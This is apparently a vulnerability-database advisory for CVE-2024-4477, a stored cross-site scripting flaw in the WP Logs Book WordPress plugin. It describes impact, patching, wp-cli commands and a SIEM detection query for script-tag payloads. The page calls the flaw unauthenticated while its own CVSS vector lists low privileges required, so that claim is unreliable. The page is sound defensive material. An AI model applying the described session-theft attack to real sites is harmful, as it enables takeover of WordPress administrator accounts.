Login Sign Up

CVE-2024-4477

5.4 MEDIUM
Cross-Site Scripting

📋 TL;DR

CVE-2024-4477 is an unauthenticated stored cross-site scripting (XSS) vulnerability in the WP Logs Book WordPress plugin. Attackers can inject malicious scripts into log entries that execute when administrators view the plugin's dashboard. This affects all WordPress sites using vulnerable versions of the WP Logs Book plugin.

💻 Affected Systems

Products:
  • WP Logs Book WordPress Plugin
Versions: through 1.0.1
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects WordPress installations with the WP Logs Book plugin installed and activated.

📦 What is this software?

Wp Logs Book by Onetarek

View all CVEs affecting Wp Logs Book →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator session cookies, perform actions as administrators (like installing backdoors), or redirect users to malicious sites.

🟠

Likely Case

Attackers inject malicious JavaScript to steal administrator credentials or session tokens, potentially leading to site compromise.

🟢

If Mitigated

With proper input validation and output escaping, the malicious scripts would be rendered harmless as text rather than executable code.

🌐 Internet-Facing: HIGH
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires no authentication and involves simple script injection into log data fields.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.0.2 or later

Vendor Advisory: https://wpscan.com/vulnerability/ab551552-944c-4e2a-9355-7011cbe553b0/

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find WP Logs Book plugin. 4. Click 'Update Now' if update available. 5. Alternatively, download version 1.0.2+ from WordPress repository and replace plugin files.

🔧 Temporary Workarounds

Disable WP Logs Book Plugin

all

Temporarily deactivate the vulnerable plugin until patched.

wp plugin deactivate wp-logs-book

Restrict Admin Dashboard Access

all

Limit access to WordPress admin dashboard to trusted IP addresses only.

🧯 If You Can't Patch

  • Disable the WP Logs Book plugin immediately.
  • Implement web application firewall (WAF) rules to block XSS payloads targeting the plugin endpoints.

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin → Plugins → Installed Plugins for WP Logs Book version. If version is 1.0.1 or earlier, you are vulnerable.

Check Version:

wp plugin get wp-logs-book --field=version

Verify Fix Applied:

After updating, verify WP Logs Book plugin version is 1.0.2 or later in WordPress admin plugins page.

📡 Detection & Monitoring

Log Indicators:

  • Unusual log entries containing script tags or JavaScript code in WP Logs Book logs
  • Multiple failed login attempts followed by successful admin login from new IP

Network Indicators:

  • HTTP POST requests to wp-logs-book endpoints containing script tags or JavaScript payloads

SIEM Query:

source="wordpress" AND (uri_path="*wp-logs-book*" AND (http_method="POST" AND (content="*<script>*" OR content="*javascript:*")))

📊 Metadata

CVE ID: CVE-2024-4477
CVSS v3 Score: 5.4 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Published: June 21, 2024
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-4477, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)